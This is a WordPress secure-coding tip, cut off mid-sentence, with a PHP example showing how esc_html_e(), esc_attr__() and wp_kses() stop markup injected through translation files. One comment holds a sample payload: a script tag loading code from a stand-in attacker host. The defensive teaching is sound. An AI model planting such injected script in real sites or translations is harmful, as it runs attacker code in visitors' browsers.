WordPress, use esc_html_e() instead of _e()

For maximum security, use esc_html_e() instead of _e() (and esc_html__() instead of __()), so that any unwanted HTML that has been snuck into a translation file is neutralised before it reaches the page.
For strings that have HTML in them, use wp_…
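The same template output written the risky way and the escaped way, as an added example that is not part of the original post. The text domain `my-plugin`, the tampered translation and the URL are constructed for illustration; wp_kses() is a real WordPress function, used here for the HTML-bearing case because the post's own recommendation is cut off above.

```php
<?php
// Added example (not from the original post). Constructed scenario: a
// tampered .mo file translates 'Thanks for visiting!' into
//   'Thanks for visiting!<script src="//evil.example/x.js"></script>'
// The text domain 'my-plugin' is a placeholder.

// Risky: _e() echoes whatever the translation file returns, markup included,
// so the injected <script> above would run in every visitor's browser.
_e( 'Thanks for visiting!', 'my-plugin' );

// Safer: esc_html_e() HTML-encodes the translated string before echoing,
// so the injected tag is rendered as literal text instead of executing.
esc_html_e( 'Thanks for visiting!', 'my-plugin' );

// Same rule for the non-echoing form: esc_html__() instead of __().
$label = esc_html__( 'Thanks for visiting!', 'my-plugin' );

// When the translated string lands inside an attribute, escape for that
// context instead: esc_attr__() rather than esc_html__().
echo '<input type="search" placeholder="' . esc_attr__( 'Search', 'my-plugin' ) . '">';

// A string that legitimately carries markup: build it, then run it through an
// allowlist so only the tags and attributes you intended survive. Anything a
// translation file adds beyond <a href> and <strong> is stripped.
$policy_url   = 'https://example.com/privacy'; // constructed value
$allowed_html = array(
	'a'      => array( 'href' => array() ),
	'strong' => array(),
);
echo wp_kses(
	sprintf(
		/* translators: %s: URL of the privacy policy page */
		__( 'Read the <a href="%s"><strong>privacy policy</strong></a>.', 'my-plugin' ),
		esc_url( $policy_url )
	),
	$allowed_html
);
```

To check a theme or plugin, grep its templates for `_e(` and `__(` calls whose result is echoed without an esc_* wrapper; each one is a place where a translation file can inject markup.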
